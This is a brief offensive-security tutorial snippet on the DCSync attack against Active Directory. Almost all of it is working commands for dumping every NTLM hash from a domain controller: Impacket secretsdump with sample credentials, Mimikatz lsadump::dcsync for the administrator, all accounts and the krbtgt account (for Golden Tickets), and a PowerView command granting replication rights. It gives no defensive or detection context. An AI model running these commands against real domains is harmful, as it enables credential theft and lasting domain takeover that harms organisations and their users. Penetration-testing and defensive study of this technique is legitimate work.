DCSync abuses Active Directory replication. If you have Domain Admin or replication rights, you can ask the DC to replicate credentials — getting every NTLM hash in the domain.
# Using Impacket secretsdump.py: python3 secretsdump.py corp.local/administrator:Admin@2024@192.168.1.10 # Using Mimikatz (from Windows with DA rights): lsadump::dcsync /domain:corp.local /user:administrator lsadump::dcsync /domain:corp.local /all /csv # Dump krbtgt hash (needed for Golden Ticket): lsadump::dcsync /domain:corp.local /user:krbtgt # With just replication rights (not full DA): # Grant replication rights to a user: # Add-ObjectACL -PrincipalIdentity ram -Rights DCSync